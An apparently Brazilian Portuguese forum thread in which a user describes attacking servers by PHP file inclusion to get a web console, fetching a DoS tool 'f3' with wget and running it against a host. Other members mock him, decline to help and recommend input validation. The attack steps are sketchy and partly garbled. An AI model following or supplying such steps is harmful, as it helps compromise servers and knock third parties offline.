[Ataques PHP]

[belchior]

Bom, sou novo no Forum mais preciso de dicas ou Possiveis Milagres

[Ataques]

Hoje muitas empresas grandes sofrem ataques, com muita facilidade, derrubando totalmente sua rede e sobrecarregando seus dados de envio e recebimento.

Servidores estão sendo muito atacados hoje em dia, inclusive eu sofro esses ataques, e resolvi aprender como execultalo.

Ele Funciona da Seguinte Forma
Você rastreia seu Servidor Com sistema operacional Linux por Telnet, Injeta um programa proxy no servidor, apos ter feito isso a maquina é sua para qualquer uso, você faz o download de um arquivo chamado f3 usado para esse processo, digita um comando e com numero de IP, Numero de Carga, e Tempo Estimado.
Como conseguir sua Shell?
Hackers hoje em dia procuram suas shells não como um servidor qualquer, e sim Injetando um codigo em PHP em sites de grandes empresas, fazendo Ataques por Servidores dedidados (Exemplo, Vivo, Claro, Revistas conhecida)
Esses hackers ultilazam formas de acesso Multiplos, nao dando pra identificar o IP.
Eles conseguem abrir um Console, um DOS por um codigo php, eu acho um absurdos FORUNS e outros tipos de lugares postando tutoriais como usalos e como atacar um outro servidor, acho que isso deveria ser proibido por lei e bloquiando acesso de sites assim,
Gostaria de saber se alguem ja ouviu fala desses ataques e poderia me ajudar.
E acabar com esse mal
Pois esses ataques passam primeiro pela sua Operadora de Banda Larga, apos Envia os dados para a Maquina, Firewalls (Softwares) não solucionaria esses caso eu acho.

Obrigado Atenciosamente
Wilson Roberto"

[ceth]

Hoje muitas empresas grandes sofrem ataques, com muita facilidade, derrubando totalmente sua rede e sobrecarregando seus dados de envio e recebimento.

As pequenas também, e isso parece um DOS, ou mesmo um DDOS!

Ele Funciona da Seguinte Forma
Você rastreia seu Servidor Com sistema operacional Linux por Telnet, Injeta um programa proxy no servidor, apos ter feito isso a maquina é sua para qualquer uso, você faz o download de um arquivo chamado f3 usado para esse processo, digita um comando e com numero de IP, Numero de Carga, e Tempo Estimado.

Muito confuso! Ta brincando de SK? O que seria o f3? Não é tão simples assim, principalmente a parte de "injeta um programa proxy no servidor"! Doidera isso!

Esses hackers ultilazam formas de acesso Multiplos, nao dando pra identificar o IP.

Fale por sí, não no geral!

Eles conseguem abrir um Console, um DOS por um codigo php.

E aonde fica a liberdade amigo? Ou será que tá propondo uma volta aos tempos de ditadura?

eu acho um absurdos FORUNS e outros tipos de lugares postando tutoriais como usalos e como atacar um outro servidor, acho que isso deveria ser proibido por lei e bloquiando acesso de sites assim,

Eu não acho! E isso não cabe mais a lei, afinal "ser hacker" já é ilegal na visão da mesma!

ps: mas concordo que seria interessante ver as autoridades brasileiras tentando bloquear esses sites :)

Gostaria de saber se alguem ja ouviu fala desses ataques e poderia me ajudar. E acabar com esse mal. Pois esses ataques passam primeiro pela sua Operadora de Banda Larga, apos Envia os dados para a Maquina, Firewalls (Softwares) não solucionaria esses caso eu acho.

Qual ataque amigo? O possível DOS ou mesmo DDOS, ou ainda o "incrível método só usado por hackers do mal" PHP Include?

No mais invadir a máquina do vizinho, pra depois usar a dele pra invadir a sua, não é nenhuma novidade. Para isso procure por computadores/redes zumbis.

Abraço amigo.


[]s,
ceth

[D4Nn]

eu acho um absurdos FORUNS e outros tipos de lugares postando tutoriais como usalos e como atacar um outro servidor, acho que isso deveria ser proibido por lei e bloquiando acesso de sites assim,

HAHA, a justiça vai proibir isso ?! meu amigo, se for pra proibir tutoriais de HACKING a justiça ia ter que ficar totalmente vidrada nesse tema, aliás, vc acha que a justiça ta ligando pra esses sites ?! eles nem sabem que existem, mas na hora de querer proibir o youtube por besteirinha, ae é outra coisa né.

Servidores estão sendo muito atacados hoje em dia, inclusive eu sofro esses ataques,

bom, conte-nos como vc está sendo atacado, seria interessante.

e resolvi aprender como execultalo.

e vc aprendeu aonde? nos próprios foruns que está querendo que a lei proiba?

[belchior]

Sim, Aprendi em um forum a 3 Meses atrás e lá encinava a efetuar os ataques e o Link do f3

O Ataque sim é considerado com um Ataque DoSS pois sobrecarrega os dados, queria que você me explicaca-se sobre essas redes/zumbis, pois na internet hoje em dia no proprio google aparece Ataque DoSS, aparece esses tais zumbis

Bom um Exemplo do ataque

Pega um site como em php
http://pchack.com.br/on.php

Ai Colocava um tal de um Console
http://pchack.com.br/on.php=Php.Konsole=Kudjsae.php

Quando injetado esse codigo aparecia uma Opção tipo um Prompt de Comando
só que comandos Linux
Efetuava o Download do f3
wget f3 (Link)
Coloca uma Senha do Arquivo e fazia a Liberação

Apos ter feito isso você digitava
./f3 (Numero do IP) (Tempo de Atack) (Dados)
intaum seria
./f3 server.myftp.org 2 280

Após ter efetuado queda imediata ^^


Iai Entendeu alguma coisa? xD

falow espero ajuda ^^

[ceth]

Sim, Aprendi em um forum a 3 Meses atrás e lá encinava a efetuar os ataques e o Link do f3

Aprendeu um "ataque", mas não sabe como funciona, o porque de usar isso ou aquilo, tsc tsc isso não cheira bem..

O Ataque sim é considerado com um Ataque DoSS pois sobrecarrega os dados, queria que você me explicaca-se sobre essas redes/zumbis, pois na internet hoje em dia no proprio google aparece Ataque DoSS, aparece esses tais zumbis

O Google não pode fazer isso por mim? melhor, por você? Em todo caso de uma olhada nesse link.

Bom um Exemplo do ataque

Pega um site como em php
http://pchack.com.br/on.php

Ai Colocava um tal de um Console
http://pchack.com.br/on.php=Php.Konsole=Kudjsae.php

Quando injetado esse codigo aparecia uma Opção tipo um Prompt de Comando
só que comandos Linux
Efetuava o Download do f3
wget f3 (Link)
Coloca uma Senha do Arquivo e fazia a Liberação

Apos ter feito isso você digitava
./f3 (Numero do IP) (Tempo de Atack) (Dados)
intaum seria
./f3 server.myftp.org 2 280

Após ter efetuado queda imediata ^^

O que você fez "ou tentou" e da pior forma possível, foi um include de PHP, se conferiu minha resposta anterior, já deve estar com "inspiração" suficiente para buscar novas fontes, por essas e outras não vou comentar mais a respeito.

Boa sorte e bons estudos!


[]s,
ceth

[belchior]

OK Obrigado pelas respostas, vou estudar mais o caso.

[ronaldocv]

Talvez esta apresentacao o ajude:

27/06/2006
Anatomia de ataques PHP: Vulnerabilidades, exploracao e contramedidas
Ivo de Carvalho Peixinho, RNP

ftp://ftp.registro.br/pub/gts/gts07/...taques-php.pdf
http://gts.nic.br/reunioes/gts-7/programa/

[mathbr]

Se voce tem medo de cair em um ataque como esse que citou

Pega um site como em php
http://pchack.com.br/on.php

Ai Colocava um tal de um Console
http://pchack.com.br/on.php=Php.Konsole=Kudjsae.php

Você não precisa estudar segurança e sim PHP pois em nenhuma linguagem de programação ou ate mesmo de script se pode confiar no que o usuário digita neste caso por exemplo, validando as variaveis nada iria ocorrer no sistema operacional, no máximo uma mensagem de erro do PHP
Detalhe konsole = Emulador de linha de comando Linux para o ambiente de janelas KDE
Por que o detalhe? Servidores dedicados não rodam ambientes graficos (Konsole ou mesmo o KDE simplesmente não existem)

[brunosolar]

Se voce tem medo de cair em um ataque como esse que citou



Você não precisa estudar segurança e sim PHP pois em nenhuma linguagem de programação ou ate mesmo de script se pode confiar no que o usuário digita neste caso por exemplo, validando as variaveis nada iria ocorrer no sistema operacional, no máximo uma mensagem de erro do PHP
Detalhe konsole = Emulador de linha de comando Linux para o ambiente de janelas KDE
Por que o detalhe? Servidores dedicados não rodam ambientes graficos (Konsole ou mesmo o KDE simplesmente não existem)

O que tem a ver estudar PHP com nao sofrer DoS ou DDoS, no maximo voce pode evitar que sua maquina seja mais uma zumbi que ira atacar o proximo.......

[rodolfo.prado]

acredito que desenvolver com seguranca seja obrigação do programador...
por isso uns ganham mais e outros menos... estude e faça suas coisas mais bem feitas...